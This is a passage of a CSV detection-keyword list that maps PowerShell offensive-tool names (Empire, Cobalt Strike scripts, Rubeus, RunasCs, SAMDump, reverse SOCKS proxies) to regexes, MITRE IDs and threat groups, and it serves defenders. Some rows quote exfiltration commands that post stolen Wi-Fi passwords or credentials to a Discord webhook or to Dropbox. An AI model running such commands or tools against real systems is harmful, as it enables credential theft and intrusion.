"*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*",".{0,1000}Invoke\-RestMethod\s\-ContentType\s\'Application\/Json\'\s\-Uri\s\$discord\s\-Method\sPost\s\-Body\s\(\$Body\s\|\sConvertTo\-Json\).{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","49449"
"*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post  -InFile * -Headers *",".{0,1000}Invoke\-RestMethod\s\-Uri\shttps\:\/\/content\.dropboxapi\.com\/2\/files\/upload\s\-Method\sPost\s\s\-InFile\s.{0,1000}\s\s\-Headers\s.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","49450"
"*Invoke-ReverseDNSLookup*",".{0,1000}Invoke\-ReverseDNSLookup.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49451"
"*Invoke-ReverseDNSLookup.ps1*",".{0,1000}Invoke\-ReverseDNSLookup\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49452"
"*Invoke-ReverseProxy*",".{0,1000}Invoke\-ReverseProxy.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","49453"
"*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","49454"
"*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","49455"
"*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","49456"
"*invokereverttoself*",".{0,1000}invokereverttoself.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","49457"
"*Invoke-RevertToSelf*",".{0,1000}Invoke\-RevertToSelf.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49458"
"*Invoke-RevertToSelf*",".{0,1000}Invoke\-RevertToSelf.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","49459"
"*Invoke-RevertToSelf*",".{0,1000}Invoke\-RevertToSelf.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49460"
"*Invoke-RevShellServer.ps1*",".{0,1000}Invoke\-RevShellServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49461"
"*Invoke-RickASCII*",".{0,1000}Invoke\-RickASCII.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49462"
"*Invoke-RIDHijacking*",".{0,1000}Invoke\-RIDHijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","49463"
"*Invoke-RIDHijacking.ps1*",".{0,1000}Invoke\-RIDHijacking\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49464"
"*invoke-ridhijacking.py*",".{0,1000}invoke\-ridhijacking\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","49465"
"*Invoke-Rubeus *",".{0,1000}Invoke\-Rubeus\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49466"
"*Invoke-Rubeus createnetonly*",".{0,1000}Invoke\-Rubeus\screatenetonly.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","0","N/A","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","49467"
"*Invoke-Rubeus s4u*",".{0,1000}Invoke\-Rubeus\ss4u.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","0","N/A","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","49468"
"*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49469"
"*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49470"
"*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49471"
"*Invoke-RunAs.ps1*",".{0,1000}Invoke\-RunAs\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49472"
"*Invoke-RunasCs -*",".{0,1000}Invoke\-RunasCs\s\-.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","49473"
"*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","49474"
"*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","49475"
"*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","49476"
"*Invoke-RunasCs.ps1*",".{0,1000}Invoke\-RunasCs\.ps1.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","49477"
"*invoke-runaspayload*",".{0,1000}invoke\-runaspayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49478"
"*Invoke-RunAsSystem.ps1*",".{0,1000}Invoke\-RunAsSystem\.ps1.{0,1000}","offensive_tool_keyword","Invoke-RunAsSystem","A simple script to elevate current session to SYSTEM (needs to be run as Administrator)","T1548.002 - T1059.001","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Invoke-RunAsSystem","1","1","N/A","N/A","8","1","14","1","2024-11-11T17:18:20Z","2023-08-24T15:12:40Z","49479"
"*Invoke-RunAsWithCert*",".{0,1000}Invoke\-RunAsWithCert.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","1","N/A","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","49480"
"*Invoke-RunningProcessCheck*",".{0,1000}Invoke\-RunningProcessCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49481"
"*Invoke-S3ssionGoph3r*",".{0,1000}Invoke\-S3ssionGoph3r.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49482"
"*Invoke-s4u2self*",".{0,1000}Invoke\-s4u2self.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","1","N/A","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","49483"
"*Invoke-S4U-persistence.ps1*",".{0,1000}Invoke\-S4U\-persistence\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","49484"
"*Invoke-SafetyKatz*",".{0,1000}Invoke\-SafetyKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49485"
"*Invoke-SamBackupFilesCheck*",".{0,1000}Invoke\-SamBackupFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49486"
"*Invoke-SAMDump *",".{0,1000}Invoke\-SAMDump\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49487"
"*Invoke-SAMDump*",".{0,1000}Invoke\-SAMDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49488"
"*Invoke-SAMDump*",".{0,1000}Invoke\-SAMDump.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49489"
"*Invoke-SauronEye*",".{0,1000}Invoke\-SauronEye.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49490"
